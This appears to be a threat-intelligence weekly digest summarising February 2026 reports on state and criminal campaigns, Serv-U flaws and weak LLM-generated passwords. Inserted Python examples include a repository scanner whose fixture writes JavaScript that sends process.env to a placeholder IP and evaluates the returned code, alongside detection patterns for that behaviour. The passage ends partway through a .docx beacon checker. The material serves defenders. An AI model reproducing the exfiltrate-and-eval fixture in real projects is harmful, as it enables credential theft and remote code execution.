<div id="weekly"> <div id="trending-threats" class="trending-threats-article"> <h2 id="article-1"><a href="https://www.anomali.com/blog/cyber-threat-briefing-iran-retaliatory-posture" target="_blank" rel="noopener noreferrer">Iran Cyber Threat Posture: Retaliation Assessed as Imminent Following Kinetic Strikes </a></h2> <p>(published: February 28, 2026)</p> <p> Researchers assess with high confidence that Iranian state-sponsored cyber retaliation against Israeli and US targets is imminent following US-Israeli kinetic strikes against Iran on February 28, 2026, designated Operation Epic Fury by the US Department of Defense. Multiple Iranian advanced persistent threat (APT) groups were assessed as showing simultaneous activity on February 27, consistent with coordinated state-directed operations. MuddyWater and BANISHED KITTEN are attributed to Iran's Ministry of Intelligence and Security (MOIS); APT42 and APT33 are assessed as operating under the Islamic Revolutionary Guard Corps (IRGC). UNC757 was also observed conducting exploitation activity during the same period. Wiper campaigns against Israeli energy, financial, government, and utility sectors are assessed as already active; Iran's documented wiper arsenal includes families such as ZeroCleare, Meteor, Dustman, DEADWOOD, Apostle, BFG Agonizer, MultiLayer, and PartialWasher. MuddyWater has reportedly deployed new malware families, including Rust-based tooling. An industrial control system (ICS) or operational technology (OT) attack using Iran's purpose-built IOCONTROL malware is assessed at 40% probability within 48 to 96 hours. Iran's domestic internet connectivity, reduced to an assessed 4%, is likely to delay but not prevent operations, given pre-positioned implants and foreign-based operators. 
Two unresolved intelligence gaps are noted: APT34/OilRig has been undetected throughout the seven-day crisis period, assessed as likely indicating covert pre-positioning, and Hezbollah cyber units have maintained complete operational silence for the same period.<br> <br><b>Analyst Comment:</b> Iran has a well-documented doctrine of deploying cyber operations in parallel with kinetic activity, and the current crisis following Operation Epic Fury represents a maximum-motivation environment in which that capability is assessed as likely to be applied at scale. Iranian APT groups were already conducting wiper operations against Israeli targets before the kinetic strikes landed, meaning the cyber retaliation timeline has effectively already begun. The most critical intelligence observation is not the confirmed activity but the silence. APT34/OilRig and Hezbollah cyber units have maintained complete operational silence throughout the seven-day crisis period, which in threat intelligence is a pre-positioning indicator, not reassurance. When these groups activate, they may already hold access to target networks. MuddyWater's shift toward Rust-based tooling may also reduce the effectiveness of detection signatures built against older malware families. Defenders should note that wiper malware destroys data with limited or no recovery mechanism beyond pre-existing backups. Organisations with adjacency to Israeli and US critical infrastructure sectors should verify offline backups are tested, recovery procedures are current, and detection coverage reflects known Iranian tactics, techniques, and procedures. <br> </p> <h2 id="article-1"><a href="https://www.helpnetsecurity.com/2026/02/26/slh-seeks-women-for-vishing-attacks/" target="_blank" rel="noopener noreferrer">Scattered Lapsus$ Hunters Recruits Female Callers for Vishing Operations </a></h2> <p>(published: February 26, 2026)</p> <p> On February 22, 2026, researchers detected posts on a public Telegram board indicating that the Scattered Lapsus$ Hunters (SLH) hacking collective is recruiting women to conduct voice-phishing (vishing) attacks, offering between $500 and $1,000 upfront per call, along with prepared impersonation scripts. SLH is an informal coalition drawing from members associated with Lapsus$, Scattered Spider, and ShinyHunters, three groups linked to the English-speaking cybercrime network known as The Com. Researchers assess the deliberate targeting of female voices likely aims to bypass caller profiles that IT help desk personnel may be trained to identify. The group has previously targeted high-profile organizations including Google, Cisco, Jaguar Land Rover, Adidas, and Qantas, and is reported to have stolen over 1.5 billion records. SLH's social engineering operations are known to include impersonating employees to manipulate IT help desk personnel into resetting account credentials, impersonating support staff to coerce employees into installing remote monitoring and management (RMM) tools, and using adaptable phishing kits that synchronize authentication flows on phishing pages with live vishing calls. Recommended defensive measures include briefing help desk personnel on scripted impersonation tactics, enforcing out-of-band identity verification for all phone-based password resets or multi-factor authentication (MFA) changes, deploying phishing-resistant authentication such as FIDO2-compliant hardware keys or passkeys, and auditing logs for privilege escalation following help desk interactions.<br> <br><b>Analyst Comment:</b> SLH's decision to recruit female callers is grounded in established psychology and should not be underestimated. 
A 2014 University of Glasgow study by McAleer, Todorov and Belin found that listeners form trustworthiness judgements within milliseconds of hearing a voice, and that women who alternated pitch were rated as more trustworthy by listeners, a finding supported by a 2025 peer-reviewed systematic review in Frontiers in Psychology which confirmed that higher-pitched voices tend to convey a less threatening demeanour, grounded in Ohala's frequency code theory. Cialdini's Liking principle further establishes that people are significantly more likely to comply with requests from those they perceive as warm and non-threatening, and critically, research shows these compliance mechanisms operate effectively even when targets believe they would recognise a social engineering attempt. That last point is the most important one for defenders to internalise. Overconfidence in the ability to detect manipulation is itself one of the most reliable vulnerabilities that skilled social engineers exploit, and SLH are skilled. This is a group that has breached organisations including Jaguar Land Rover, in attacks where vishing served as the documented initial access vector. A well-rehearsed female caller armed with a prepared script, projecting warmth and confidence, is not an easy threat to detect in real time. 
Help desk staff who believe otherwise are exactly who SLH is counting on.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/32052">T1566.004 - Phishing: Spearphishing Voice</a> | <a href="https://ui.threatstream.com/attackpattern/32040">T1656 - Impersonation</a><br> </p> <h2 id="article-1"><a href="https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-new-position-medusa-ransomware" target="_blank" rel="noopener noreferrer">Lazarus Group Deploys Medusa Ransomware Against Middle East and US Healthcare Targets </a></h2> <p>(published: February 24, 2026)</p> <p> Researchers have identified North Korean state-sponsored threat group Lazarus deploying Medusa ransomware in an attack against an unnamed organization in the Middle East and in a separate, unsuccessful attempt against a US healthcare organization. Medusa is a ransomware-as-a-service (RaaS) platform operated by the Spearwing cybercrime group, launched in 2023, with more than 366 claimed attacks to date. Analysis of the Medusa leak site identified four US healthcare and nonprofit organizations as victims since early November 2025, with an average ransom demand of $260,000. It is unknown whether all of these victims were targeted by North Korean operatives or by other Medusa affiliates. The Lazarus toolkit observed across these campaigns includes Comebacker, a custom backdoor and loader exclusively associated with Lazarus; Blindingcan, a remote access Trojan (RAT); ChromeStealer, a Chrome password extraction tool; Infohook, an information stealer; Mimikatz, a publicly available credential-dumping utility; Curl, an open-source data transfer utility; and RP_Proxy, a custom proxying tool. Attribution to a specific Lazarus sub-group remains unclear. 
Tactics overlap with prior Stonefly operations, but Comebacker has also been associated with Pompilus (Diamond Sleet), complicating sub-group attribution.<br> <br><b>Analyst Comment:</b> Lazarus's adoption of Medusa continues a pattern of North Korean actors integrating third-party RaaS platforms into their operations, following prior associations with the Maui and Play ransomware families. This approach complicates attribution because a Medusa detection alone does not confirm North Korean involvement; other unrelated criminal affiliates use the same ransomware. Defenders should prioritise behavioural indicators and Lazarus-specific tooling, particularly Comebacker and Blindingcan, over detections based on the ransomware binary alone. The mixed toolset, drawing on tools previously associated with both Stonefly and Pompilus (Diamond Sleet), may reflect collaboration across Lazarus sub-groups, tool sharing within the cluster, or deliberate obfuscation to frustrate attribution. The average ransom demand of $260,000 suggests financially motivated targeting rather than strategic selection, and organisations without obvious geopolitical significance should not assume they are out of scope. 
Prior US indictments and a published $10 million reward for a named Stonefly operator have not visibly slowed activity, and healthcare and nonprofit organisations remain active targets.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/10104">T1574.002 - Hijack Execution Flow: DLL Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9633">T1003 - OS Credential Dumping</a> | <a href="https://ui.threatstream.com/attackpattern/10025">T1555.003 - Credentials from Password Stores: Credentials from Web Browsers</a> | <a href="https://ui.threatstream.com/attackpattern/9628">T1090 - Proxy</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/10080">T1486 - Data Encrypted for Impact</a> | <a href="https://ui.threatstream.com/attackpattern/32041">T1657 - Financial Theft</a><br> <b>Target Industry:</b> Healthcare, Nonprofit, Education<br> <b>Target Region:</b> Americas<br> <b>Source Country:</b> Korea, Democratic People's Republic of<br> <b>Source Region:</b> Asia<br> </p> <h2 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/" target="_blank" rel="noopener noreferrer">Critical SolarWinds Serv-U Flaws Offer Root Access to Servers </a></h2> <p>(published: February 24, 2026)</p> <p> SolarWinds released security updates on February 24, 2026, patching four critical remote code execution vulnerabilities in Serv-U, its self-hosted file transfer software for Windows and Linux. All four flaws carry a Common Vulnerability Scoring System (CVSS) score of 9.1 and are resolved in Serv-U version 15.5.4. The most severe, CVE-2025-40538, is a broken access control flaw that allows an attacker already holding domain admin or group admin privileges to create a system administrator account and execute arbitrary code as root. 
CVE-2025-40539 and CVE-2025-40540 are type confusion vulnerabilities, a class of memory flaw that can be exploited to execute arbitrary native code at root level. CVE-2025-40541 is an Insecure Direct Object Reference (IDOR) flaw that enables root-level code execution. All four require the attacker to already hold administrative privileges, which limits opportunistic exploitation but represents meaningful risk where privileged credentials have been compromised. SolarWinds has not confirmed active exploitation of any of the four vulnerabilities. Shodan tracks more than 12,000 internet-exposed Serv-U servers, though Shadowserver estimates fewer than 1,200. Prior Serv-U flaws have been exploited in ransomware and data theft operations.
<br> <br><b>Analyst Comment:</b> Organisations running Serv-U should prioritise upgrading to version 15.5.4, the only documented remediation. While all four vulnerabilities require an attacker to already hold administrative privileges, this prerequisite does not substantially reduce risk in environments where admin credentials may be exposed or where an attacker has already established a foothold. In that context, these flaws could enable full root-level code execution on infrastructure that commonly handles sensitive data transfers. SolarWinds has not confirmed active exploitation, though prior Serv-U vulnerabilities have been exploited in the wild, in some cases within days of public disclosure, including by ransomware operators and a state-linked threat actor. Organisations unable to patch immediately should audit admin access to Serv-U and monitor for unexpected administrator account creation. Those on version 15.5.1 or earlier should note that these versions reached End-of-Engineering on February 18, 2026 and will receive no further security patches.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/10012">T1190 - Exploit Public-Facing Application</a> | <a href="https://ui.threatstream.com/attackpattern/10093">T1068 - Exploitation For Privilege Escalation</a> | <a href="https://ui.threatstream.com/attackpattern/9642">T1136 - Create Account</a><br> </p> <h2 id="article-1"><a href="https://www.microsoft.com/en-us/security/blog/2026/02/24/c2-developer-targeting-campaign/" target="_blank" rel="noopener noreferrer">Malicious Next.js Repositories Used to Backdoor Developer Machines via Job-Themed Lures</a></h2> <p>(published: February 24, 2026)</p> <p> Researchers identified a coordinated campaign targeting software developers through malicious repositories disguised as legitimate Next.js projects and recruiting-themed technical assessment materials. 
The repositories are engineered to trigger malicious execution during routine developer activity, with three distinct entry points: opening the project in Visual Studio Code, where workspace automation abuses .vscode/tasks.json to execute code on folder open; running the development server, where trojanized assets such as modified jquery.min.js files silently retrieve and execute a remote loader; and starting the application backend, where malicious module imports decode a base64-encoded endpoint, exfiltrate environment variables (process.env), and execute attacker-supplied JavaScript via dynamic compilation. Regardless of which path is taken, all three converge on the same two-stage backdoor. Stage 1 profiles the host and establishes a persistent polling loop that can execute server-provided JavaScript in memory without writing files to disk. Stage 2 upgrades that foothold into a full operator-controlled tasking client, supporting directory enumeration and staged file exfiltration through a multi-step upload workflow. Loader payloads are staged on Vercel; post-execution Command and Control (C2) traffic routes to four attacker-controlled IP addresses over HTTP on port 3000. Scope expansion beyond initial telemetry was achieved by pivoting on shared repository naming conventions, including Cryptan, JP-soccer, and RoyalJapan. Attribution was not established.
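The three triggers described above all leave static artefacts in the checkout, so a repository can be triaged before it is ever opened in an editor or run. The following Python script is an added example written for this digest, not code from the Microsoft report or from any of the repositories it names. It flags a `.vscode/tasks.json` task whose `runOptions.runOn` is `folderOpen`, a vendored `*.min.js` that fetches and evaluates remote content, and a module that decodes a base64 string literal into an endpoint while reading `process.env` and evaluating code dynamically. The sample repository it builds, the file names, and the 203.0.113.10:3000 endpoint (a TEST-NET-3 address) are constructed placeholders, not campaign indicators.

```python
import base64
import json
import re
import tempfile
from pathlib import Path

# Added example, not code from the Microsoft report or from any project it names.
# It triages a cloned repository for the three entry points described above.
# The fixture in build_sample_repo() is constructed for illustration; the IP
# (TEST-NET-3) and file names are placeholders, not campaign indicators.

B64_LITERAL = re.compile(
    r"""Buffer\.from\(\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*,\s*['"]base64['"]\s*\)"""
    r"""|atob\(\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*\)""")
DYNAMIC_EXEC = re.compile(r"\bnew Function\(|\beval\(|vm\.runIn(?:This|New)Context\(")
REMOTE_FETCH = re.compile(r"\bfetch\(|XMLHttpRequest|\bhttps?\.get\(")
ENV_ACCESS = re.compile(r"process\.env\b")
ENDPOINT = re.compile(r"^(?:https?|wss?)://|^[\w.-]+:\d+")


def decode_b64_literals(text):
    """Decode base64 string literals passed to Buffer.from/atob; keep printable results."""
    out = []
    for m in B64_LITERAL.finditer(text):
        try:
            s = base64.b64decode(m.group(1) or m.group(2), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.isprintable():
            out.append(s)
    return out


def scan_tasks_json(path):
    """Entry point 1: a VS Code task that runs on folder open (runOptions.runOn)."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))  # plain JSON; real tasks.json may be JSONC
    except (ValueError, OSError):
        return []
    return [{"kind": "vscode-folderOpen-task", "path": str(path),
             "detail": task.get("command") or task.get("label", "")}
            for task in data.get("tasks", [])
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen"]


def scan_js(path):
    """Entry points 2 and 3: a vendored asset that fetches and evaluates remote code,
    and a module that decodes a base64 endpoint, reads process.env and evals."""
    text = path.read_text(encoding="utf-8", errors="replace")
    findings = []
    endpoints = [s for s in decode_b64_literals(text) if ENDPOINT.match(s)]
    if endpoints:
        findings.append({"kind": "base64-endpoint", "path": str(path), "detail": endpoints})
    if ENV_ACCESS.search(text) and DYNAMIC_EXEC.search(text):
        findings.append({"kind": "env-read-plus-dynamic-exec", "path": str(path), "detail": ""})
    if path.name.endswith(".min.js") and REMOTE_FETCH.search(text) and DYNAMIC_EXEC.search(text):
        findings.append({"kind": "vendored-asset-loader", "path": str(path), "detail": ""})
    return findings


def scan_repo(root):
    """Walk a checkout (skipping node_modules) and collect findings for review."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file() or "node_modules" in p.parts:
            continue
        if p.name == "tasks.json" and p.parent.name == ".vscode":
            findings += scan_tasks_json(p)
        elif p.suffix in {".js", ".mjs", ".cjs", ".ts"}:
            findings += scan_js(p)
    return findings


def build_sample_repo(root):
    """Constructed fixture reproducing the three triggers (not real campaign files)."""
    root = Path(root)
    (root / ".vscode").mkdir(parents=True)
    (root / ".vscode" / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "prepare", "type": "shell", "command": "node ./scripts/setup.js",
                   "runOptions": {"runOn": "folderOpen"}}]}))
    (root / "public").mkdir()
    (root / "public" / "jquery.min.js").write_text(
        "/*! jQuery v3.7.1 */fetch('/assets/init').then(r=>r.text()).then(t=>new Function(t)());")
    (root / "server").mkdir()
    endpoint = base64.b64encode(b"http://203.0.113.10:3000/api/config").decode()
    (root / "server" / "config.js").write_text(
        "const e=Buffer.from('" + endpoint + "','base64').toString();\n"
        "fetch(e,{method:'POST',body:JSON.stringify(process.env)})"
        ".then(r=>r.text()).then(c=>new Function(c)());\n")
    (root / "pages").mkdir()
    (root / "pages" / "index.js").write_text("export default function Home(){return null}\n")


def demo_scan():
    """Build the fixture in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_repo(d)
        return scan_repo(d)


if __name__ == "__main__":
    for f in demo_scan():
        print(f["kind"], f["path"], f["detail"])
```

Findings are review items, not verdicts: legitimate projects do use folderOpen tasks and some minified libraries contain `eval`, so pair the output with the behavioural signals the analyst comment describes rather than blocking on a single hit.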
<br> <br><b>Analyst Comment:</b> The central insight from this campaign is not the sophistication of the backdoor but the deliberate design of the delivery mechanism. Across the identified repositories, three independent execution paths were observed, each triggering through a different routine developer action, meaning that mitigations applied in isolation, such as disabling Visual Studio Code workspace automation, may not prevent compromise if the other paths remain active. Untrusted repositories should not be run on any machine with access to credentials, sensitive resources, or production-adjacent infrastructure regardless of the context in which they were received. The use of Vercel as a staging platform for initial loader delivery is also notable; because Vercel is a legitimate and widely used service, outbound connections to it are unlikely to trigger network-based controls, which suggests behavioural detection is the more reliable approach at the initial stage. In practice, defenders should focus on what developer tooling is doing on the network rather than where it is connecting to. 
Unusual outbound activity from Node.js processes, repeated calls to external endpoints at short intervals, and environment variable access occurring at server startup are the signals most likely to surface this activity.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/9615">T1204.002 - User Execution: Malicious File</a> | <a href="https://ui.threatstream.com/attackpattern/10112">T1059.007 - Command and Scripting Interpreter: JavaScript</a> | <a href="https://ui.threatstream.com/attackpattern/9586">T1546 - Event Triggered Execution</a> | <a href="https://ui.threatstream.com/attackpattern/30598">T1027.010 - Obfuscated Files or Information: Command Obfuscation</a> | <a href="https://ui.threatstream.com/attackpattern/9838">T1140 - Deobfuscate/Decode Files or Information</a> | <a href="https://ui.threatstream.com/attackpattern/9956">T1082 - System Information Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9863">T1083 - File and Directory Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/10014">T1552.001 - Unsecured Credentials: Credentials in Files</a> | <a href="https://ui.threatstream.com/attackpattern/9802">T1005 - Data from Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9803">T1074 - Data Staged</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/9844">T1104 - Multi-Stage Channels</a> | <a href="https://ui.threatstream.com/attackpattern/9715">T1071.001 - Application Layer Protocol: Web Protocols</a> | <a href="https://ui.threatstream.com/attackpattern/9720">T1571 - Non-Standard Port</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a><br> </p> <h2 id="article-1"><a href="https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign" target="_blank" rel="noopener noreferrer">Google Disrupts UNC2814 GRIDTIDE Global Espionage Campaign </a></h2> <p>(published: February 25, 2026)</p> <p> Google Threat Intelligence Group (GTIG), Mandiant, and industry partners disrupted a global cyber espionage campaign conducted by UNC2814, a suspected People's Republic of China (PRC)-nexus threat actor tracked since 2017. As of February 18, the campaign had confirmed intrusions across 53 victims in 42 countries spanning four continents, and suspected infections had been identified in at least 20 additional countries; targeting focused primarily on telecommunications providers and government organizations across Africa, Asia, and the Americas. The actor deployed a novel C-based backdoor, GRIDTIDE, which abuses legitimate Google Sheets application programming interface (API) functionality for command and control (C2), disguising malicious traffic within cloud API requests. Post-compromise activity included lateral movement via SSH, privilege escalation to root, persistence established through a systemd service, and deployment of SoftEther VPN Bridge for encrypted outbound connectivity. GRIDTIDE can execute arbitrary shell commands, upload files, and download files. The backdoor was dropped on an endpoint containing personally identifiable information (PII), including full names, phone numbers, dates of birth, and national ID numbers. GTIG did not directly observe data exfiltration during this campaign. Disruption actions included terminating all attacker-controlled Google Cloud Projects, disabling known UNC2814 infrastructure and accounts, revoking Google Sheets API access, and issuing victim notifications. GTIG has released indicators of compromise (IOCs) linked to UNC2814 infrastructure active since at least 2023. 
UNC2814 has no observed overlap with Salt Typhoon.<br> <br><b>Analyst Comment:</b> Abusing legitimate cloud service APIs for C2 renders reputation-based network detection largely ineffective, as malicious traffic is indistinguishable from normal application behaviour at the network layer. This tactic is not exclusive to UNC2814 and is likely to become more prevalent. The confirmed scale of this campaign, 53 victims across 42 countries with suspected activity in at least 20 more, suggests the actor operated with significant freedom for an extended period, which is consistent with infrastructure the source traces to 2018. For defenders in the telecommunications and government sectors, reviewing the released IOCs and deploying the GTIG detection queries against Google Sheets API activity should be treated as a priority action. Organisations outside these sectors face lower direct risk from UNC2814 based on observed targeting, but the underlying C2 methodology is transferable and warrants broader defensive consideration. 
The explicit confirmation that UNC2814 has no overlap with Salt Typhoon is also notable, as it reinforces that Chinese state-linked targeting of telecommunications infrastructure involves multiple distinct actors operating in parallel.<br> <br><b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/attackpattern/9809">T1059.004 - Command and Scripting Interpreter: Unix Shell</a> | <a href="https://ui.threatstream.com/attackpattern/9879">T1543.002 - Create or Modify System Process: Systemd Service</a> | <a href="https://ui.threatstream.com/attackpattern/9926">T1036.003 - Masquerading: Rename System Utilities</a> | <a href="https://ui.threatstream.com/attackpattern/9623">T1132.002 - Data Encoding: Non-Standard Encoding</a> | <a href="https://ui.threatstream.com/attackpattern/9631">T1033 - System Owner/User Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9956">T1082 - System Information Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9656">T1021.004 - Remote Services: SSH</a> | <a href="https://ui.threatstream.com/attackpattern/9870">T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9802">T1005 - Data from Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9723">T1102.002 - Web Service: Bidirectional Communication</a> | <a href="https://ui.threatstream.com/attackpattern/9717">T1573.001 - Encrypted Channel: Symmetric Cryptography</a> | <a href="https://ui.threatstream.com/attackpattern/9812">T1219 - Remote Access Software</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a><br> <b>Target Industry:</b> Telecommunications, Government<br> <b>Target Region:</b> Africa<br> <b>Source Country:</b> China<br> <b>Source Region:</b> Asia<br> </p> <h2 id="article-1"><a href="https://cyberpress.org/llm-passwords-easily-predicted/" target="_blank" rel="noopener noreferrer">Vibe Password Generation: Predictable by Design </a></h2> <p>(published: February 23, 2026)</p> <p> Researchers tested password generation across multiple large language models (LLMs), including current versions of GPT, Claude, and Gemini, and found that all produce passwords with significantly lower entropy than they appear to have. Because LLMs operate by iteratively predicting the next token from a non-uniform probability distribution, the output is structurally incompatible with cryptographically secure password generation, which requires uniform random sampling. Testing Claude Opus 4.6 across 50 independent sessions produced only 30 unique passwords, with a single password repeating 18 times; entropy analysis using Shannon's formula estimated approximately 27 bits of actual entropy against an expected 98 bits for a truly random 16-character password. Adjusting temperature provided no meaningful improvement. Coding agents, including Claude Code, Codex, and Gemini-CLI, were also observed generating LLM-produced passwords in lieu of invoking secure system tools, with behavior varying based on subtle differences in prompt phrasing. LLM-generated password patterns have been identified in public GitHub repositories, including hardcoded credentials in Docker Compose files and application configuration scripts. Researchers assess that these predictable patterns could enable targeted brute-force attacks against services where AI-generated code introduced LLM-produced credentials. Recommended mitigations include auditing and rotating potentially LLM-generated credentials, and directing coding agents to use cryptographically secure generation methods such as openssl rand.<br> <br><b>Analyst Comment:</b> AI-assisted development environments may already contain LLM-generated credentials in production configurations, potentially without the development team's knowledge. 
Coding agents can generate passwords silently as a side effect of broader tasks, and standard entropy calculators may rate those passwords as strong, meaning existing tooling is unlikely to flag them. Organisations with significant AI-assisted development exposure should prioritise auditing codebases, configuration files, and infrastructure-as-code for hardcoded credentials that match known LLM password patterns, and rotate anything identified. Beyond remediation, this research has broader defensive implications. At an estimated 20 to 27 bits of actual entropy, many LLM-generated passwords fall within ranges that researchers assess are feasible to crack on commodity hardware, meaning the risk extends beyond live authentication attempts to post-breach credential cracking scenarios. Defenders should verify that compensating controls are in place across their environment: rate limiting and account lockout on authentication endpoints, multi-factor authentication where applicable, and monitoring for credential stuffing activity. Exposed or poorly protected login interfaces warrant particular attention in environments where AI-generated code may have introduced weak credentials. From an intelligence perspective, the statistical patterns underpinning LLM password generation are model-specific, publicly documented, and consistent enough that purpose-built wordlists targeting these distributions are a plausible near-term attacker development. 
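To make the entropy gap concrete, the following Python example is added here and is not the researchers' code. It scores a batch of passwords two ways, as whole strings and as the sum of per-position character entropies, and contrasts a constructed stand-in for a template-reusing generator with passwords drawn from the operating system CSPRNG through Python's `secrets` module, the same intent as the `openssl rand` recommendation above. The 70-symbol alphabet is an assumption chosen so that a uniform 16-character password scores about 98 bits, matching the figure quoted; `predictable_samples()` is a fixture, not output captured from any model, and its seeded use of `random` exists only to make the fixture repeatable.

```python
import math
import random
import secrets
import string
from collections import Counter

# Added example, not the researchers' code: measure how much entropy a batch of
# generated passwords actually carries, then generate one from the OS CSPRNG.
# The 70-symbol alphabet is an assumption chosen so that a uniform 16-character
# password scores about 98 bits, the figure quoted above. predictable_samples()
# is a constructed stand-in for an LLM, not output from any model.

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"  # 52 + 10 + 8 = 70 symbols


def theoretical_entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Entropy of a password drawn uniformly: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)


def shannon_bits(counts):
    """Shannon entropy, in bits, of a frequency table."""
    n = sum(counts.values())
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def whole_password_entropy_bits(samples):
    """Entropy of the passwords as whole strings. Bounded by log2(len(samples)),
    so it cannot reach 98 bits with 50 samples; what it exposes is repetition."""
    return shannon_bits(Counter(samples))


def positional_entropy_bits(samples):
    """Sum of per-position character entropies across the batch. Still bounded
    by the sample size, but a generator reusing a few templates scores far below
    one that samples every position independently."""
    length = min(len(s) for s in samples)
    return sum(shannon_bits(Counter(s[i] for s in samples)) for i in range(length))


def predictable_samples(n_sessions=50, seed=7):
    """Constructed stand-in for 'ask the model for a password' across sessions:
    a few favoured templates with an occasional one-character tweak. The seeded
    random module is used only to build this fixture, never to make passwords."""
    rng = random.Random(seed)
    templates = ["Xk9#mP2$vL7@qR4!", "Qw3!Zt8#Lm5$Bn1@", "Hg7$Vr2!Ks9#Pe4@", "Mn4@Tq6$Yx1!Cw8#"]
    out = []
    for _ in range(n_sessions):
        pw = rng.choices(templates, weights=[0.4, 0.3, 0.2, 0.1])[0]  # non-uniform, like next-token sampling
        if rng.random() < 0.3:  # small variation, like sampling at non-zero temperature
            i = rng.randrange(len(pw))
            pw = pw[:i] + rng.choice(string.digits) + pw[i + 1:]
        out.append(pw)
    return out


def secure_password(length=16, alphabet=ALPHABET):
    """Uniform sampling from the OS CSPRNG (the same intent as `openssl rand`)."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def compare(n_sessions=50):
    """Return entropy estimates for the predictable fixture and for secure_password()."""
    weak = predictable_samples(n_sessions)
    strong = [secure_password() for _ in range(n_sessions)]
    return {
        "theoretical_16_chars": theoretical_entropy_bits(16),
        "batch_bound_16_chars": 16 * math.log2(n_sessions),  # ceiling any 50-sample estimate can reach
        "weak_unique": len(set(weak)),
        "weak_whole": whole_password_entropy_bits(weak),
        "weak_positional": positional_entropy_bits(weak),
        "strong_positional": positional_entropy_bits(strong),
    }


if __name__ == "__main__":
    for k, v in compare().items():
        print(f"{k:>22}: {v:.2f}" if isinstance(v, float) else f"{k:>22}: {v}")
```

Both empirical measures are capped by the batch size (16 × log2 50 ≈ 90 bits for 50 samples), so they cannot certify that a generator reaches 98 bits; what they do is expose a generator whose outputs cluster, which is the failure the research describes. Anything scoring well below the batch bound is a rotation candidate.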
The groundwork for that tooling is already public.<br> </p> <h2 id="article-1"><a href="https://thehackernews.com/2026/02/apt28-targeted-european-entities-using.html" target="_blank" rel="noopener noreferrer">APT28 Targeted European Entities Using Webhook-Based Macro Malware </a></h2> <p>(published: February 23, 2026)</p> <p> APT28 (also tracked as Fancy Bear, Forest Blizzard, and FROZENLAKE) conducted a spear-phishing campaign against specific entities in Western and Central Europe between late September 2025 and January 2026, in activity researchers have codenamed Operation MacroMaze. Lure documents embed an INCLUDEPICTURE field in their XML referencing a webhook[.]site URL, which triggers an outbound HTTP request on document open to confirm delivery. One identified lure impersonated an alleged agenda dated September 18, 2025, from Spain's Ministry of the Presidency, Justice and Relations with the Courts, reproducing content published on the official La Moncloa website on September 23, 2025. Four macro variants were identified across the campaign period; all drop six files (VBS, BAT, CMD, HTM, and XHTML) into the %USERPROFILE% folder using GUID-like filenames, and all use heavy string concatenation to assemble components and evade static detection. A CMD file establishes persistence by registering a scheduled task, with repetition intervals of 30 minutes in variant 1, 20 minutes in variant 2, and 61 minutes in variants 3 and 4, before deleting itself and associated artifacts from disk. Two batch file variants handle execution and exfiltration: the first uses Microsoft Edge headless mode with targeted window-title-based process termination for stealth, while the second moves an off-screen browser window and forcibly terminates all Edge processes for execution reliability. Command output is embedded in an auto-submitting HTML form and exfiltrated via POST to a second webhook[.]site endpoint. 
The command payload used to collect system information could not be recovered during analysis.<br> <br><b>Analyst Comment:</b> Operation MacroMaze is a reminder that operational effectiveness does not require technical sophistication. APT28 has constructed a functional intrusion and exfiltration chain from batch files, VBScript, and standard HTML, routing both payload delivery and data exfiltration through webhook[.]site, a legitimate developer service. Blocking this domain entirely may cause collateral impact in environments where it is used legitimately, making behavioural detection the more reliable defensive approach. Defenders should prioritise EDR visibility into Office macro child process lineage, specifically instances of Microsoft Edge being spawned with headless or off-screen arguments as part of a document execution chain. Scheduled task creation events (Windows Event ID 4698) following document opens warrant close attention, as does outbound HTTP activity to webhook[.]site originating from Office processes. The use of ephemeral infrastructure and aggressive on-disk artifact deletion suggests the actor likely favours short collection windows over persistent access in this campaign, which may narrow detection opportunities. The unrecovered command payload means the full scope of collected information cannot be confirmed. Organisations in Western and Central Europe with government or policy relevance should treat this activity as directly applicable to their threat profile.
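Because the INCLUDEPICTURE beacon lives in the document XML rather than in macro code, it can be found without opening the file in Word. The following Python check is an added example, not code from the reporting on Operation MacroMaze: it unzips a .docx, reads simple fields (`w:fldSimple`) and complex fields (joined `w:instrText` runs) for INCLUDEPICTURE codes that point at remote URLs, flags relationships with `TargetMode="External"`, and notes an embedded `vbaProject.bin`. The fixture it writes is constructed, and its beacon host under the reserved `.invalid` domain is a placeholder; `webhook.site` is the only host in the high-interest list because it is the one the report names.

```python
import re
import tempfile
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

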